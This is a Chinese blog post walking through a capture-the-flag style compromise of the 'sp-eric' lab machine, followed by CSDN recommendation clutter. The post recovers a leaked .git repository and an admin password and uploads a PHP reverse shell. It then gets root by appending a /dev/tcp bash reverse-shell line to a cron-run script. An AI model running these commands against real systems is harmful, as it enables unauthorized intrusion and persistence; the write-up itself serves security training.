sp-eric靶机

最新推荐文章于 2024-08-27 15:58:06 发布
最新推荐文章于 2024-08-27 15:58:06 发布
阅读量298 收藏 3
点赞数 4
文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65285254/article/details/141197685
版权

端口扫描

靶机ip地址为192.168.7.46

目录扫描

访问80端口

拼接访问 /admin.php

发现登录框

测试sql注入,弱口令等,无结果

扫描目录发现了.git文件,存在源码泄漏

将其下载到kali上读取

python2 GitHack.py -u http://192.168.7.180/.git/

发现账号密码

admin:st@mpch0rdt.ightiRu$glo0mappL3

登录成功

存在文件上传功能,kali生成反弹shell

locate php-reverse-shell.php

cp /usr/share/webshells/php/php-reverse-shell.php .

vim php-reverse-shell.php

将ip改为kali的ip 设置端口

上传文件

开启监听

访问 /upload/php-reverse-shell.php

成功反弹shell

获得交互式shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

查看系统配置文件

在 /home/eric 下发现文件

查看内容

/etc/crontab 存在计划任务

可以写入反弹shell语句

echo 'bash -i >& /dev/tcp/192.168.7.100/9999 0>&1' >> backup.sh

kali监听

反弹成功

提权成功

在 /root 下发现flag文件

m0_65285254
关注
  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
sqli-labs-master靶机
10-12
sqli-labs是一个专门为学习和测试SQL注入技术而设计的靶机平台,它提供了多个层次的练习,帮助用户逐步理解和掌握SQL注入的防范与应对策略。 一、sqli-labs靶机介绍 sqli-labs靶机由一系列精心设计的挑战组成,每个...
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
浏览器发送HTTP请求的过程
学Python的小白!
08-25 1430
浏览器发送HTTP请求的过程是一个复杂但有序的步骤,‌主要包括以下几个阶段:‌1.构建请求,2.查找缓存、3.DNS解析、4.建立TCP连接、5.发送HTTP请求、6.服务器处理请求、7.服务器发送响应、8.客户端处理响应、9.关闭连接。
哪些类型的企业需要开展TPM管理培训?
tianxingjian713的博客
08-23 896
例如汽车制造企业、电子制造企业等,这些企业的生产线通常由大量高精度的自动化设备组成,一旦设备出现故障,可能会导致整个生产线停产,造成巨大的经济损失。开展TPM管理培训可以提高员工对设备的维护和管理能力,延长设备的使用寿命,降低设备维修成本,提高物流服务的效率和质量。通过开展TPM管理培训,让设备操作人员、维护人员和管理人员共同参与设备维护,实现设备的零故障运行,从而提高企业的竞争力。通过开展TPM管理培训,让员工了解设备的运行原理和风险点,加强设备的日常巡检和维护,提高设备的安全性和可靠性。
系统编程 网络 http协议
qq_69971969的博客
08-24 445
--------------------------------------表示了资源所在的路径。意思:域名解析=>把对应的域名解析为对应的ip。<协议>://<主机>:<端口>/<路径>万维网:http解决万维网之间互联互通。http:应用层协议,底层是tcp协议。http协议------应用层的协议。1.如何在万维网中表示一个资源?http协议加密:tls,ssl。计算机web端网络只能看到文字。<http>只是协议的一种。html 超文本标记语言。http 超文本传输协议。
33.python socket
最新发布
笔生花的博客
08-27 461
python socket 心跳包 数据包
2024年入职/转行网络安全,该如何规划?_网络安全职业规划
2401_85023531的博客
08-23 1143
前段时间,知名机构麦可思研究院发布了《2022年中国本科生就业报告》,其中详细列出近五年的本科绿牌专业,其中,信息安全位列第一。
计网面经111
qq_43578042的博客
08-24 174
3、流量控制:TCP使用滑动窗口协议来控制发送方发送数据的速率,接收方会告诉发送方它的缓冲区大小,发送方会根据接收方的缓冲区大小来控制发送速率,确保接收方不会因为太快而丢失数据。2、序列号和确认号:TCP将每个数据段都分配一个序列号和确认号,序列号用于标识数据段的位置,确认号用于确认已经收到的数据段的位置,这样可以避免数据丢失或乱序。通过以上这些机制,TCP保证了数据的可靠传输,但是也会造成一定的延迟,因为数据包需要等待确认和重传,以及滑动窗口和拥塞控制会限制发送速率。
计算机网络面试真题总结(四)
月伴飞鱼
08-26 398
由于网络的MTU限制,你不能一次性发送整个文件,所以你需要将文件拆分成多个小的数据包进行发送,这就是TCP拆包。UDP不属于连接协议,具有资源消耗少,处理速度快的优点,所以通常音频,视频和普通数据在传送时,使用UDP较多。在传统的HTTP/1.0版本中,每次请求完成后,TCP连接都会被关闭,下次请求需要重新建立连接,这种方式称为。接收端在接收到数据包后,会向发送端确认已接收到的数据包序号,并告诉发送端自己的接收窗口大小。连接的方式,在一次连接上进行多次请求和响应的机制,以提高性能和效率。
zabbix5.0与7.0版本区别 切换建议
qq_43800449的博客
08-23 648
1.1 高效的数据处理和存储1.2 改进的代理和主机性能3.1 现代化用户界面3.2 提升的导航和搜索功能4.1 扩展的监控选项4.2 改进的报警和通知5.1 扩展的 API 支持
EXSi配置虚拟机的网络模式为NAT和仅主机
shyuu的博客
08-24 963
场景:在VMware里创建的EXSI虚拟机并且添加了个桥接模式的网卡,EXSI虚拟机里想要创建CentOS多台虚拟机,分别配置NAT模式和仅主机模式。
python socket 发生UDP 和 UDPServer接受UDP实例
lyq308152569的博客
08-23 609
【代码】python socket 发生UDP 和 UDPServer接受UDP实例。
交换机和防火墙怎样重装系统
m0_57121953的博客
08-26 161
给电脑和服务器重装系统,那是常有的事,其实交换机、路由器和防火墙有时候也需要重装系统,本文就以华为交换机和H3C防火墙为例,讲解一下给交换机和防火墙重装系统的操作步骤。案例一、华为交换机系统被误删除某客户反馈,删除华为S5700交换机日志的时候,把系统文件也删除了,交换机无法启动,显示Auto booting failed。远程登录客户的电脑,让他重启交换机的时候,看到屏幕上显示Ctrl+B的时候...
除了tcp和udp以外的其他传输协议
weixin_53389944的博客
08-27 121
QUIC(Quick UDP Internet Connections):基于UDP的新一代传输协议,旨在提供更快的连接和传输速度。RTP(Real-time Transport Protocol):用于实时传输音频和视频数据,常用于VoIP和视频会议等应用。WS(WebSockets):基于TCP的协议,支持全双工通信,常用于实现实时Web应用。这些传输协议在不同的场景和应用中扮演着重要的角色,用于满足不同类型数据传输的需求。
重发布实验
2302_77625887的博客
08-26 213
1.如图搭建网络拓扑,所有路由器各自创建一个环回接 口,合理规划IP地址2.R1-R2-R3-R4-R6之间使用OSPF协议,R4-R5-R6之间使用 RIP协议3.R1环回重发布方式引入OSPF网络4.R4/R6上进行双点双向重发布5.分析网络中出现路由环路的原因6.路由优化。
【铂电阻测温】精密测温模块ZAM6222在化学发光分析仪中的应用
ZLG_zhiyuan的博客
08-23 540
化学发光分析仪一般由主机和计算机两部分组成。其中主机为仪器的运行反应测定部分,主要由材料配备模块、液路模块、温度控制模块、机械传动模块、光路检测模块、电路控制模块等组成。材料配备模块包括反应杯、样品盘、试剂盘等在仪器上的贮存和处理装置;液路模块包括过滤器、真空泵、管道、样本探针及试剂探针等;温度控制模块包括试剂储存器、孵育器等;机械传动模块包括传感器、运输轨道、机械臂等;光路检测模块包括光电倍增管;电路控制模块包括电源和核心控制板。
kali linux部署upload-labs靶机
09-08
要在Kali Linux上部署upload-labs靶机,您需要按照以下步骤进行操作: 1. 首先,您需要通过SSH连接到一个Linux主机。根据提供的端口和地址,使用以下命令连接到目标主机: `ssh -p 25142 root@node4.buuoj.cn` 2. 下载并解压upload-labs靶机安装包。您可以使用提供的链接下载`upload-labs-0.1.zip`文件。将其解压缩,并将相关文件放入容器中以供运行。 3. 确保您的Kali Linux系统满足Docker的运行要求。首先,检查当前Linux系统的内核版本,使用以下命令: `uname -a` 如果内核版本大于等于3.10,您的系统符合要求。否则,您可能需要更新内核或使用支持Docker的其他系统。 4. 更新apt源以满足下载要求。根据您的具体需求,可能需要更新apt源来获取所需的软件包。 5. 启动upload-labs靶机。根据提供的问题描述,您可能需要进行代码审计,并利用文件包含漏洞,通过URL参数来读取敏感文件。一个示例的URL可能是:`http://your-upload-labs-url/?file=/flag`,其中`your-upload-labs-url`是您部署upload-labs靶机的URL地址。您需要根据具体情况进行进一步的测试和配置。 请注意,这只是一个简要的概述,并且具体的部署步骤可能会因不同的环境和需求而有所不同。建议您参考相关文档和指南以获取更详细的部署信息。<span class="em">1</span><span class="em">2</span><span class="em">3</span><span class="em">4</span>
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值